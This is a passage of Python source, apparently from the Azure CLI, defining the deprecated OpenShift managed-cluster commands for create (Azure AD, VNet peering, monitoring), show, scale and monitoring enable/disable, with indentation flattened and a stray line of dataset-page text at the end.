if aad_client_app_id is None and aad_client_app_secret is None and aad_tenant_id is None:
create_aad = True
osa_aad_identity = _ensure_osa_aad(cmd.cli_ctx,
aad_client_app_id=aad_client_app_id,
aad_client_app_secret=aad_client_app_secret,
aad_tenant_id=aad_tenant_id, identifier=None,
name=name, create=create_aad,
customer_admin_group_id=customer_admin_group_id)
identity_providers.append(
OpenShiftManagedClusterIdentityProvider(
name='Azure AD',
provider=osa_aad_identity
)
)
auth_profile = OpenShiftManagedClusterAuthProfile(identity_providers=identity_providers)
default_router_profile = OpenShiftRouterProfile(name='default')
if vnet_peer is not None:
from msrestazure.tools import is_valid_resource_id, resource_id
if not is_valid_resource_id(vnet_peer):
vnet_peer = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network', type='virtualNetwork',
name=vnet_peer
)
if workspace_id is not None:
workspace_id = _format_workspace_id(workspace_id)
monitor_profile = OpenShiftManagedClusterMonitorProfile(enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long
else:
monitor_profile = None
network_profile = NetworkProfile(vnet_cidr=vnet_prefix, peer_vnet_id=vnet_peer)
osamc = OpenShiftManagedCluster(
location=location, tags=tags,
open_shift_version="v3.11",
network_profile=network_profile,
auth_profile=auth_profile,
agent_pool_profiles=agent_pool_profiles,
master_pool_profile=agent_master_pool_profile,
router_profiles=[default_router_profile],
monitor_profile=monitor_profile)
try:
# long_running_operation_timeout=300
result = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name=resource_group_name, resource_name=name, parameters=osamc)
result = LongRunningOperation(cmd.cli_ctx)(result)
instance = client.get(resource_group_name, name)
_ensure_osa_aad(cmd.cli_ctx,
aad_client_app_id=osa_aad_identity.client_id,
aad_client_app_secret=osa_aad_identity.secret,
aad_tenant_id=osa_aad_identity.tenant_id, identifier=instance.public_hostname,
name=name, create=create_aad)
except CloudError as ex:
if "The resource type could not be found in the namespace 'Microsoft.ContainerService" in ex.message:
raise CLIError('Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
if "No registered resource provider found for location" in ex.message:
raise CLIError('Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
raise ex
def openshift_show(cmd, client, resource_group_name, name):
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
mc = client.get(resource_group_name, name)
return _remove_osa_nulls([mc])[0]
def openshift_scale(cmd, client, resource_group_name, name, compute_count, no_wait=False):
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
instance = client.get(resource_group_name, name)
# TODO: change this approach when we support multiple agent pools.
idx = 0
for i in range(len(instance.agent_pool_profiles)):
if instance.agent_pool_profiles[i].name.lower() == "compute":
idx = i
break
instance.agent_pool_profiles[idx].count = int(compute_count) # pylint: disable=no-member
# null out the AAD profile and add manually the masterAP name because otherwise validation complains
instance.master_pool_profile.name = "master"
instance.auth_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def openshift_monitor_enable(cmd, client, resource_group_name, name, workspace_id, no_wait=False):
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
instance = client.get(resource_group_name, name)
workspace_id = _format_workspace_id(workspace_id)
monitor_profile = OpenShiftManagedClusterMonitorProfile(enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long
instance.monitor_profile = monitor_profile
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def openshift_monitor_disable(cmd, client, resource_group_name, name, no_wait=False):
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
instance = client.get(resource_group_name, name)
monitor_profile = OpenShiftManagedClusterMonitorProfile(enabled=False, workspace_resource_id=None) # pylint: disable=line-too-long
instance.monitor_profile = monitor_profile
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.